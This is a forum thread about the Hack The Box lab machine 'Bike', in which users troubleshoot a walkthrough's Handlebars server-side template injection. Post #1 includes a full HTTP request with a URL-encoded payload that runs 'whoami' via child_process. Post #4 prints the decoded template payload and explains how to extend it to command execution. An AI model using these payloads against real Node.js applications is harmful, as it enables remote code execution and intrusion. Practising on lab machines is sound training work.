Starting Point: Bike

HTB Content Machines
, , , , , , , , ,
#1

This box isn’t working the way it should according to the walkthrough. In burp repeater I execute:

POST / HTTP/1.1

Host: 10.129.12.226

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Origin: http://10.129.12.226

Connection: close

Referer: http://10.129.12.226/

Upgrade-Insecure-Requests: 1



email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%0a%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit

I get back this:

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: text/html; charset=utf-8

Content-Length: 1172

ETag: W/"494-RpawBI+3kN5Kwt8S54wY32132DQ"

Date: Wed, 18 May 2022 15:21:07 GMT

Connection: close



<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="css/home.css">
    <title> Bike </title>
</head>
<header>

</header>

<body>
    <div id=container>
  <img
    src="images/buttons.gif"
    id="avatar">
  <div class="type-wrap">
    <span id="typed" style="white-space:pre;" class="typed"></span>
  </div>
</div>
<div id="contact">
    <h3>We can let you know once we are up and running.</h3>
    <div class="fields">
      <form id="form" method="POST" action="/">
        <input name="email" placeholder="E-mail"></input>
        <button type="submit" class="button-54" name="action" value="Submit">Submit</button>
      </form>
    </div>
    <p class="result">
        We will contact you at:  e
 2
 [object Object]
 function Function() { [native code] }
 2
 [object Object]

    </p>
</div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="js/typed.min.js"></script>
    <script src="js/main.js"></script>
</body>

</html>

According to the walkthrough I should get this:

Screenshot 2022-05-18 162503
Screenshot 2022-05-18 1625031274×567 52.5 KB

#2

I found out that it’s possible to follow this walkthrough all the way through if you use the pwnbox, but not if you’re using Kali-Linux-2022.2-virtualbox-amd64. Does anyone know why this is? What’s the vital difference?

#3

@mercadier I am running into the exact same issue. I’m using Ubuntu 22.04 LTS. Have you found a solution or you still waiting for a solution?

#4

I was having the same problem. I got around it by encoding the code block:

{{#with “s” as |string|}}
{{#with “e”}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub “constructor”)}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push “return process.mainModule;”}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

Then instead of copying the next code blocks, just append the additional code onto the end of mainModule. You should be able to get the flag this way.

#5

I think machine does not work. I’ve got “The connection was reset” in pwnbox when entering magic {{7*7}}.

#6

Hello there, I am having the exact same issue described by @SampleService

I am using a fresh install of Kali 2022.2 as guest on Vbox, but I’ve got the same issue even with a Debian as host.

#7

I’m having something similar. When I’m entering {{7*7}}, the error page is not loading. So I don’t see the server-side error code. I only get the firefox error page that the site could not be loaded. “Firefox can’t establish a connection to the server at 10.129.196.1.”

  • I’m connected via OpenVPN.
  • Kali Linux 2022.2
#8

Exact same issue here, please file a case to customer service like i did. I believe in case they 'll receive massive load of such queries this might speed up the process for this machine.

#9

I’m running into exact same issue.
I send {{7*7}}, received “The connection was reset”.

#10

The machine is now working properly, just solved without any problems!